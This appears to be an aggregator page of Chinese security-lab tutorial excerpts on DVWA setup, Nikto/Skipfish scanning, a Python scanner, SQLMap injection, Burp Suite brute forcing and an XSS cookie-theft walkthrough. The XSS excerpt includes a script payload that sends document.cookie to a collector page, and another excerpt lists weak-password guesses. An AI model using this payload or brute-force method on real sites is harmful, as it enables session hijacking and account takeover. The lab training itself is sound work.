dvwa

Windows下安装sqlmap(Python+sqlmap+dvwa)

匿名 (未验证) 提交于 2019-12-02 22:51:30
http://sqlmap.org/ <下载sqlmap的zip文件--解压---将文件所在路径添加到环境变量的PATH里面> 将解压之后的dvwa文件放在PHP环境下(www目录下) 将config文件夹下面的config.inc.php.bak复制一份命名为config.inc.php 修改里面关于数据库的信息 在浏览器中访问该文件,进行安装 安装之后使用账号admin 密码password即可登录 文章来源: Windows下安装sqlmap(Python+sqlmap+dvwa)

Kali学习笔记24:Nikto、Skipfish

匿名 (未验证) 提交于 2019-12-02 21:53:52
文章的格式也许不是很好看,也没有什么合理的顺序 完全是想到什么写一些什么,但各个方面都涵盖到了 能耐下心看的朋友欢迎一起学习,大牛和杠精们请绕道 实验环境: Kali机器IP:192.168.163.132 Metasploitable机器IP:192.168.163.129 下面我介绍几个工具:Nikto、Skipfish Nikto了解即可,重点要学会使用Skipfish Nikto: 一个Perl语言编写的扫描器,小巧便捷,弱点:1.功能有限、2.命令行工具通病,结果不便查看 指定IP地址和端口: nikto也支持HTTPS扫描: 扫描出来的结果不能说不全面,但是,命令行的形式是真的不方便看: 有一个参数可以把这个导出来:-output,但我感觉并不能从本质上改变什么 nikto还可以和nmap结合: 我这一行的意思:nmap扫描某个网段,把所有开放80端口的主机再交给nikto进行扫描 使用代理: Nikto可以实现HTTP身份认证・,然而现在的HTTP认证方式罕见 下面这个工具相对于Nikto来说,界面会美观很多 Skipfish: C语言编写,虽说也是一个命令行的扫描器,但界面更友好,功能比较强大,我喜欢用 扫描完之后,结果是一个网页的形式,比较美观的 速度较快,误报几率低,基于字典而递归爬网 使用Skipfish要注意必须使用:-o参数,输出 使用: skipfish

Python Ethical Hacking - VULNERABILITY SCANNER(9)

≯℡__Kan透↙ 提交于 2019-12-02 20:12:34
Automatically Discovering Vulnerabilities Using the Vulnerability Scanner 1. Modify the run_scanner method in the scanner class. #!/usr/bin/env python import requests import re from bs4 import BeautifulSoup from urllib.parse import urljoin class Scanner: def __init__(self, url, ignore_links): self.session = requests.Session() self.target_url = url self.target_links = [] self.links_to_ignore = ignore_links def extract_links_from(self, url): response = self.session.get(url) return re.findall('(?:href=")(.*?)"', response.content.decode(errors='ignore')) def crawl(self, url=None): if url == None:

(九)DVWA之SQL Injection--SQLMap&Fiddler测试(High)

爱⌒轻易说出口 提交于 2019-12-02 15:31:29
一、测试需求分析 测试对象 :DVWA漏洞系统--SQL Injection模块--ID提交功能 防御等级 :High 测试目标 :判断被测模块是否存在SQL注入漏洞,漏洞是否可利用,若可以则检测出对应的数据库数据 测试方式 :手工+Fiddler+ SQLMap工具 url: http://localhost:8001/dvwa/vulnerabilities/sqli/ 被测模块(防御:High) session-input.php代码 <?php define( 'DVWA_WEB_PAGE_TO_ROOT', '../../' ); require_once DVWA_WEB_PAGE_TO_ROOT . 'dvwa/includes/dvwaPage.inc.php'; dvwaPageStartup( array( 'authenticated', 'phpids' ) ); $page = dvwaPageNewGrab(); $page[ 'title' ] = 'SQL Injection Session Input' . $page[ 'title_separator' ].$page[ 'title' ]; if( isset( $_POST[ 'id' ] ) ) { $_SESSION[ 'id' ] = $_POST[ 'id' ]; //$page[

dvwa下利用xss获取cookie并利用

强颜欢笑 提交于 2019-12-02 15:18:04
首先呢,需要先有一个dvwa的靶场,我这里是在本地搭建了一个,先访问127.0.0.1,正常用户名密码登录 这里就以low级别进行操作 选择反射型xss题目,先使用弹窗测试一下<script>alert(123)</script> 确定可以使用代码之后,在搭建的服务器目录下创建一个cookie.php,我这里是C:\wamp\www(仅供参考) 目的是为了将获取到的cookie,保存到cookie.php所在目录下自动生成一个cookie.txt 接下来需要根据题目构造js语句 <script>document.location='http://127.0.0.1/cookie.php?cookie='+document.cookie;</script> 将js语句输入,提交,成功的话会跳转到另一个界面 现在我先查看一下文件目录,可以看到是已经成功创建了一个名为cookie.txt的文本 另外能够看到浏览器url框内有一个cookie的值 获取到cookie后打开另外一个浏览器访问dvwa(因为本地搭建原因,除非重新打开浏览器,否则cookie不能正常刷新,所以直接打开另一个浏览器方便一些),f12打开开发者工具,找到cookie值 将之前获取到的cookie值给替换上去,把security的impossible改为low,回到登录界面,在url后面加上获取到的cookie信息

【渗透测试-web安全】DVWA-暴力破解

て烟熏妆下的殇ゞ 提交于 2019-12-02 08:42:44
【渗透测试-web安全】DVWA-暴力破解 基本思路 配置实操 登录系统 设置安全级别 burpsuite暴力破解 抓包 设置暴破内容 导入字典 开始暴破 基本思路 暴力破解首先应该做的是: 构建弱口令 构建常见用户名 根据对应的破解场景构建特定的用户名密码组合 配置实操 登录系统 设置安全级别 尝试Low安全设置下的暴力破解 构建常见用户名、密码组合 常见用户名 常见密码 常见用户名 常见密码 admin password root root test test administrator administrator manage abc123 system 123456 test123 qwerty 根据列表我们得知一共能够组成的组合是 7 * 7 = 49 中可能性的排列组合 burpsuite暴力破解 抓包 设置暴破内容 注:这里的Attack type应该设置成Cluster bomb的格式 导入字典 开始暴破 根据对应的数据长度我们能够判断正确的用户名密码: 如图我们能够知道对应的用户名是:admin 密码是:password 不同等级的破解难度肯定有巨大的差别所以日常进行破解的过程中时间可能会很久。 而且还有可能碰到很多反暴力破解的,比如设置IP黑名单、设置错误登录次数、设置每次登录错误后延时1分钟才能再次登录、设置验证码等 来源: https://blog.csdn

SQL注入汇总(手注,盲注,报错注入,宽字节,二次编码,http头部){10.22、23 第二十四 二十五天}

Deadly 提交于 2019-12-02 06:46:11
首先什么是SQL注入:   所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。 SQL注入有什么危害?   危害:数据泄露、脱库、篡改网站、破坏数据库、植入后门、getshell(获取网站权限) 为什么会有SQL注入漏洞?   后端代码在执行的过程将用户输入的数据也当做代码来执行,违背一个原则:代码和数据相分离(本质问题)   前段传递的数据可以随意控制,参数可控;后端对前段传递过来的数据没有过滤或者过滤不严谨,最终导致SQL注入(注入的原因) 首先本人现在只学了四五种SQL注入方式,仅作为学习参看,如有错误多多见谅=。= SQL注入本人认为只要能找到注入点就简单了,大不了各种方式往上面试喽,虽然时间成本很大。 所以所只要在有跟数据库进行交互的地方就有可能出现SQL漏洞,在这些地方找注入点就很重要啦。 SQL注入常用的数据库函数及常量 常用的数据库函数以及常量 @@tmpdir 临时目录 @@datadir @@basedir 数据库所在的位置 @@version 版本 @@hostname 当前数据库名字 user() version() 版本 database() 获取数据库 concat() group_concat() concat_wa() substr():oracle,mysql,mssq

2019-9-9:渗透测试,docker下载dvwa,使用报错型sql注入dvwa

烂漫一生 提交于 2019-12-02 00:13:53
docker 下载dvwa镜像,报错型注入dvwa,low级 一,安装并配置docker 1,更新源,apt-get update && apt-get upgrade && apt-get clean 2,安装docker,apt-get install docker.io 3, 配置docker加速器,vim /etc/docker/daemon.json { "registry-mirrors": [ "https://dockerhub.azk8s.cn", "https://reg-mirror.qiniu.com" ] } 二、使用docker下载安装运行dvwa 1,搜索dvwa镜像,docker search dvwa 2,安装dvwa镜像,docker pull citizenstig/dvwa 3,查看确定下载完成,输入命令docker images,确定有dvwa 4.运行dvwa,docker run -d –rm -p 8008:80 –name dvwa d9c7999da701 5,确定dvwa容器使用的端口被打开,netstat -ntulp |grep 8008 6,靶机访问127.0.0.1:8008确定可以访问 7,点击Create/Reset Database创建好数据库,点击Login 8,用户名admin,密码password,访问正常

【渗透测试小白系列】之BurpSuite爆破High级别的DVWA(含CSRF-Token防爆破程序)

ぐ巨炮叔叔 提交于 2019-12-01 16:54:53
(本文仅为平时学习记录,若有错误请大佬指出,如果本文能帮到你那我也是很开心啦) 该文章参考 https://www.cnblogs.com/rnss/p/11233006.html ,感谢!!!本文仅为了学习交流,严禁非法使用!!! 一 、Token Token: 主要用来防御CSRF,而无法防止暴力破解,这是因为将一个随机产生的Token加入请求之后,每次请求Token都会改变,CSRF攻击者只能窃取受害者的cookie却不能伪造当次请求的Token,Token无法防止暴力破解的原因是Token每次都会随页面返回到前端,攻击者只要想办法自动化获得前端的Token即可进行暴力破解攻击 二、爆破过程 1.用火狐浏览器打开搭建好的DVWA站点,点击DVWA Security,调保护措施级别为High 这里已知DVWA的默认登录为admin,密码为password 2.点击Brute Force爆破,进入以下界面 3.破解单项,知道用户名,破解密码: 在DVWA的爆破中输入账号,密码随机输入,开启火狐浏览器的代理,打开BP,开启拦截状态,再回到DVWA点击登录,BP中就拦截到数据包,所拦截的数据包如下图所示 4.将拦截到的数据发送到Intruder模块,点击进入Intruder中的Positions模块,点击Clear键,去除不需要爆破的项,在重新选择要爆破的项,点击Add

用BurpSuite爆破DVWA

巧了我就是萌 提交于 2019-12-01 15:53:23
本次使用BP的inturder模块,测试该模块下四种爆破方式的异同 四种方式 爆破 DVWA(Brute Force) 测试 工具: burpsuite ,使用 intruder 模块 环境: DVWA , security 设置为 low 1 、 sniper 两个参数 一个字典(知晓其中一个参数) 先匹配第一项,再匹配第二项,开始爆破 用爆破结果测试 2 、 battering ram : 两个参数,这种攻击适合那种需要在请求中把相同的输入放到多个位置的情况。 一个字典同时作用于两个参数,只有密码和用户名相同才能爆破成功。 由于第一次测试知道了用户名密码并不相同,所以爆破失败 3 、 pitch fork :两个字典,两个参数,同行匹配,短的截止。 这种攻击类型非常适合那种不同位置中需要插入不同但相关的输入的情况。 这种方式字典一会一一对应字典二( a[1]--b[1] ),直到字典较短的 attack 处理完了,爆破结束 因为导入的字典没有匹配项为 “ admin---password ”的,所以爆破失败 修改字典使得匹配项符合 爆破成功 4 、 cluster bomb : ‘两个字典,两个参数,交叉匹配,所有可能。 两个字典将会循环搭配组合进行 attack 处理,这种攻击适用于那种位置中需要不同且不相关或者未知的输入的攻击。 Payload 1 导入用户名字典